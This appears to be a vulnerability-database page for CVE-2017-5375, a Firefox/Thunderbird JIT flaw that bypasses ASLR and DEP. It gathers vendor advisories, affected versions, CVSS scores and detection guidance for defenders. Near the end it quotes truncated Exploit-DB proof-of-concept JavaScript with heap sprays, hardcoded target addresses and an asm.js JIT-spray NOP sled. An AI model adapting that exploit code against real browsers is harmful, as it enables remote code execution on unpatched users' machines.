CVE-2017-5375
published 2018-06-11CVE-2017-5375: JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. This vulnerability affects Thunderbird <…
PriorityP264critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
33.43%
98.2th percentile
JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.
Affected
24 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | firefox | < firefox 51.0-1 (sid) | firefox 51.0-1 (sid) |
| debian | firefox-esr | < firefox 51.0-1 (sid) | firefox 51.0-1 (sid) |
| mozilla | firefox | < 45.7.0 | 45.7.0 |
| mozilla | firefox | < 51.0.1 | 51.0.1 |
| mozilla | firefox | >= 0 < 51.0.1+build2-0ubuntu0.14.04.1 | 51.0.1+build2-0ubuntu0.14.04.1 |
| mozilla | firefox | >= 0 < 51.0.1+build2-0ubuntu0.14.04.2 | 51.0.1+build2-0ubuntu0.14.04.2 |
| mozilla | firefox | >= 0 < 51.0.1+build2-0ubuntu0.16.04.1 | 51.0.1+build2-0ubuntu0.16.04.1 |
| mozilla | firefox | >= 0 < 51.0.1+build2-0ubuntu0.16.04.2 | 51.0.1+build2-0ubuntu0.16.04.2 |
| mozilla | firefox | >= unspecified < 51 | 51 |
| mozilla | firefox_esr | >= unspecified < 45.7 | 45.7 |
| mozilla | thunderbird | < 45.7.0 | 45.7.0 |
| mozilla | thunderbird | >= 0 < 1:45.7.0+build1-0ubuntu0.14.04.1 | 1:45.7.0+build1-0ubuntu0.14.04.1 |
| mozilla | thunderbird | >= 0 < 1:45.7.0+build1-0ubuntu0.16.04.1 | 1:45.7.0+build1-0ubuntu0.16.04.1 |
| mozilla | thunderbird | >= unspecified < 45.7 | 45.7 |
| redhat | enterprise_linux_desktop | — | — |
| redhat | enterprise_linux_desktop | — | — |
| redhat | enterprise_linux_desktop | — | — |
| redhat | enterprise_linux_server | — | — |
| redhat | enterprise_linux_server | — | — |
| redhat | enterprise_linux_server | — | — |
| redhat | enterprise_linux_workstation | — | — |
| redhat | enterprise_linux_workstation | — | — |
| redhat | enterprise_linux_workstation | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
0xa8909090 (repeated NOP sled pattern in ASM.JS JIT spray)
- →Detect ASM.JS JIT-spray by monitoring for repeated arithmetic additions using the constant 0xa8909090 within asm.js modules, indicative of a NOP sled embedded in JIT-compiled code. ↗
- →Detect exploit trigger pattern: use of Web Workers combined with SVG namespace, ArrayBuffer allocations of sizes 0x80 and 0x100, and large Array heap sprays (0x1000, 0x4000 elements) in the same page context. ↗
- →Detect large-scale ASM.JS module spraying: creation of thousands of identical asm.js module instances (e.g., 0x1800 or 0x1000 regions) used to predictably place JIT-compiled shellcode at known memory addresses. ↗
- →Detect heap spray of fake DOM node objects targeting fixed addresses (e.g., 0x20200000, 0x30300000, 0x5a500000) using large ArrayBuffer blocks with crafted offsets, characteristic of this JIT-spray exploit chain. ↗
- →Firefox versions below 51 and Firefox ESR / Thunderbird below 45.7 are vulnerable; flag use of these specific versions in network traffic User-Agent strings or software inventory. ↗
- →The exploit uses a fixed ArrayBuffer offset of 0x88 for Firefox 50.0.1 to corrupt object internals; monitor for ArrayBuffer index manipulation at this specific offset in conjunction with asm.js spray activity. ↗
- ·The hardcoded JIT payload target addresses (e.g., 0x1c1c0054, 0x3c3c1dc8, 0x20200b58) are version-specific and rely on predictable JIT code placement; they will differ across Firefox builds, OS versions, and ASLR states. ↗
- ·The exploit's ArrayBuffer corruption offset (0x88) is specific to Firefox 50.0.1 on Windows 32-bit; this value will vary for other Firefox versions or platforms. ↗
- ·The float constant pool offset for asm.js JIT spray (0xXXXX1dc8 for Fx 44.0.2, 0xXXXX0b58 for Fx 46.0.1) is version-specific and must be recalculated for other builds. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vendor_debian9.8CRITICAL
vendor_redhat9.8CRITICAL
vendor_ubuntu9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Firefox regression
vendor_ubuntu·2017-02-06·CVSS 9.8
[CRITICAL] Firefox regression
Title: Firefox regression
Summary: USN-3175-1 introduced a regression in Firefox.
USN-3175-1 fixed vulnerabilities in Firefox. The update caused a
regression on systems where the AppArmor profile for Firefox is set to
enforce mode. This update fixes the problem.
We apologize for the inconvenience.
Original advisory details:
Multiple memory safety issues were discovered in Firefox. If a user were
tricked in to opening a specially crafted website, an attacker could
potentially exploit these to cause a denial of service via application
crash, or execute arbitrary code. (CVE-2017-5373, CVE-2017-5374)
JIT code allocation can allow a bypass of ASLR protections in some
circumstances. If a user were tricked in to opening a specially crafted
website, an attacker could potentially exploit this
Ubuntu
Thunderbird vulnerabilities
vendor_ubuntu·2017-01-28·CVSS 9.8
CVE-2016-9893 [CRITICAL] Thunderbird vulnerabilities
Title: Thunderbird vulnerabilities
Summary: Several security issues were fixed in Thunderbird.
Multiple memory safety issues were discovered in Thunderbird. If a user were
tricked in to opening a specially crafted message, an attacker could
potentially exploit these to cause a denial of service via application
crash, or execute arbitrary code. (CVE-2016-9893, CVE-2017-5373)
Andrew Krasichkov discovered that event handlers on elements
were executed despite a Content Security Policy (CSP) that disallowed
inline JavaScript. If a user were tricked in to opening a specially
crafted website in a browsing context, an attacker could potentially
exploit this to conduct cross-site scripting (XSS) attacks.
(CVE-2016-9895)
A memory corruption issue was discovered in WebGL in some circumstances.
If
Ubuntu
Firefox vulnerabilities
vendor_ubuntu·2017-01-27·CVSS 9.8
CVE-2017-5373 [CRITICAL] Firefox vulnerabilities
Title: Firefox vulnerabilities
Summary: Firefox could be made to crash or run programs as your login if it
opened a malicious website.
Multiple memory safety issues were discovered in Firefox. If a user were
tricked in to opening a specially crafted website, an attacker could
potentially exploit these to cause a denial of service via application
crash, or execute arbitrary code. (CVE-2017-5373, CVE-2017-5374)
JIT code allocation can allow a bypass of ASLR protections in some
circumstances. If a user were tricked in to opening a specially crafted
website, an attacker could potentially exploit this to cause a denial of
service via application crash, or execute arbitrary code. (CVE-2017-5375)
Nicolas Grégoire discovered a use-after-free when manipulating XSL in
XSLT documents in some circ
Red Hat
Mozilla: Excessive JIT code allocation allows bypass of ASLR and DEP (MFSA 2017-02)
vendor_redhat·2017-01-24·CVSS 9.8
CVE-2017-5375 [CRITICAL] Mozilla: Excessive JIT code allocation allows bypass of ASLR and DEP (MFSA 2017-02)
Mozilla: Excessive JIT code allocation allows bypass of ASLR and DEP (MFSA 2017-02)
JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.
Debian
CVE-2017-5375: firefox - JIT code allocation can allow for a bypass of ASLR and DEP protections leading t...
vendor_debian·2017·CVSS 9.8
CVE-2017-5375 [CRITICAL] CVE-2017-5375: firefox - JIT code allocation can allow for a bypass of ASLR and DEP protections leading t...
JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.
Scope: local
sid: resolved (fixed in 51.0-1)
GHSA
GHSA-m73w-mj59-ggvj: JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks
ghsa_unreviewed·2022-05-14
CVE-2017-5375 [CRITICAL] CWE-119 GHSA-m73w-mj59-ggvj: JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks
JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.
OSV
CVE-2017-5375: JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks
osv·2018-06-11·CVSS 9.8
CVE-2017-5375 [CRITICAL] CVE-2017-5375: JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks
JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.
OSV
firefox regression
osv·2017-02-06·CVSS 9.8
[CRITICAL] firefox regression
firefox regression
USN-3175-1 fixed vulnerabilities in Firefox. The update caused a
regression on systems where the AppArmor profile for Firefox is set to
enforce mode. This update fixes the problem.
We apologize for the inconvenience.
Original advisory details:
Multiple memory safety issues were discovered in Firefox. If a user were
tricked in to opening a specially crafted website, an attacker could
potentially exploit these to cause a denial of service via application
crash, or execute arbitrary code. (CVE-2017-5373, CVE-2017-5374)
JIT code allocation can allow a bypass of ASLR protections in some
circumstances. If a user were tricked in to opening a specially crafted
website, an attacker could potentially exploit this to cause a denial of
service via application crash, or execute
OSV
thunderbird vulnerabilities
osv·2017-01-28·CVSS 9.8
CVE-2016-9893 [CRITICAL] thunderbird vulnerabilities
thunderbird vulnerabilities
Multiple memory safety issues were discovered in Thunderbird. If a user were
tricked in to opening a specially crafted message, an attacker could
potentially exploit these to cause a denial of service via application
crash, or execute arbitrary code. (CVE-2016-9893, CVE-2017-5373)
Andrew Krasichkov discovered that event handlers on elements
were executed despite a Content Security Policy (CSP) that disallowed
inline JavaScript. If a user were tricked in to opening a specially
crafted website in a browsing context, an attacker could potentially
exploit this to conduct cross-site scripting (XSS) attacks.
(CVE-2016-9895)
A memory corruption issue was discovered in WebGL in some circumstances.
If a user were tricked in to opening a specially crafted website in a
OSV
firefox vulnerabilities
osv·2017-01-27·CVSS 9.8
CVE-2017-5373 [CRITICAL] firefox vulnerabilities
firefox vulnerabilities
Multiple memory safety issues were discovered in Firefox. If a user were
tricked in to opening a specially crafted website, an attacker could
potentially exploit these to cause a denial of service via application
crash, or execute arbitrary code. (CVE-2017-5373, CVE-2017-5374)
JIT code allocation can allow a bypass of ASLR protections in some
circumstances. If a user were tricked in to opening a specially crafted
website, an attacker could potentially exploit this to cause a denial of
service via application crash, or execute arbitrary code. (CVE-2017-5375)
Nicolas Grégoire discovered a use-after-free when manipulating XSL in
XSLT documents in some circumstances. If a user were tricked in to opening
a specially crafted website, an attacker could potentially explo
No detection rules found.
Exploit-DB
Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution
exploitdb·2018-03-16·CVSS 8.8
CVE-2017-5375 [HIGH] Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution
Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution
---
46.0.1
-->
CVE-2016-1960 and ASM.JS JIT-Spray
"use strict"
var Exploit = function(){
this.asmjs = new Asmjs()
this.heap = new Heap()
}
Exploit.prototype.go = function(){
/* target address of fake node object */
var node_target_addr = 0x20200000
/* target address of asm.js float pool payload*/
var target_eip = 0x3c3c1dc8
/* spray fake Node objects */
this.heap.spray(node_target_addr, target_eip)
/* spray asm.js float constant pools */
this.asmjs.spray_float_payload(0x1800)
/* go! */
this.trigger_vuln(node_target_addr)
};
Exploit.prototype.trigger_vuln = function(node_ptr){
document.body.innerHTML = ''
this.heap.gc()
var a = new Array()
for (var i=0; i td';
*/
/* easier to exploit codepath */
document.getElementById(
Exploit-DB
Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution
exploitdb·2018-03-16·CVSS 8.8
CVE-2017-5375 [HIGH] Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution
Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution
---
CVE-2016-2819 and ASM.JS JIT-Spray
"use strict"
var Exploit = function(){
this.asmjs = new Asmjs()
this.heap = new Heap()
}
Exploit.prototype.go = function(){
/* target address of fake node object */
var node_target_addr = 0x5a500000
/* target address of asm.js float pool payload*/
var target_eip = 0x20200b58
/* spray asm.js float constant pools */
this.asmjs.spray_float_payload(0x1000)
/* spray fake Node objects */
this.heap.spray(node_target_addr, target_eip)
/* go! */
this.trigger_vuln(node_target_addr)
};
Exploit.prototype.trigger_vuln = function(node_ptr){
document.body.innerHTML = ''
this.heap.gc()
var a = new Array()
for (var i=0; i hr {}'
*/
/* easier to exploit codepath */
document.getElementById('BBBB').out
Exploit-DB
Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution
exploitdb·2017-07-14·CVSS 7.5
CVE-2017-5375 [HIGH] Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution
Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution
---
function asm_js_module(){
"use asm";
/* huge jitted nop sled */
function payload_code(){
var val = 0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa890
http://rhn.redhat.com/errata/RHSA-2017-0190.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0238.htmlhttp://www.securityfocus.com/bid/95757http://www.securitytracker.com/id/1037693https://bugzilla.mozilla.org/show_bug.cgi?id=1325200https://security.gentoo.org/glsa/201702-13https://security.gentoo.org/glsa/201702-22https://www.debian.org/security/2017/dsa-3771https://www.debian.org/security/2017/dsa-3832https://www.exploit-db.com/exploits/42327/https://www.exploit-db.com/exploits/44293/https://www.exploit-db.com/exploits/44294/https://www.mozilla.org/security/advisories/mfsa2017-01/https://www.mozilla.org/security/advisories/mfsa2017-02/https://www.mozilla.org/security/advisories/mfsa2017-03/http://rhn.redhat.com/errata/RHSA-2017-0190.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0238.htmlhttp://www.securityfocus.com/bid/95757http://www.securitytracker.com/id/1037693https://bugzilla.mozilla.org/show_bug.cgi?id=1325200https://security.gentoo.org/glsa/201702-13https://security.gentoo.org/glsa/201702-22https://www.debian.org/security/2017/dsa-3771https://www.debian.org/security/2017/dsa-3832https://www.exploit-db.com/exploits/42327/https://www.exploit-db.com/exploits/44293/https://www.exploit-db.com/exploits/44294/https://www.mozilla.org/security/advisories/mfsa2017-01/https://www.mozilla.org/security/advisories/mfsa2017-02/https://www.mozilla.org/security/advisories/mfsa2017-03/
2018-06-11
Published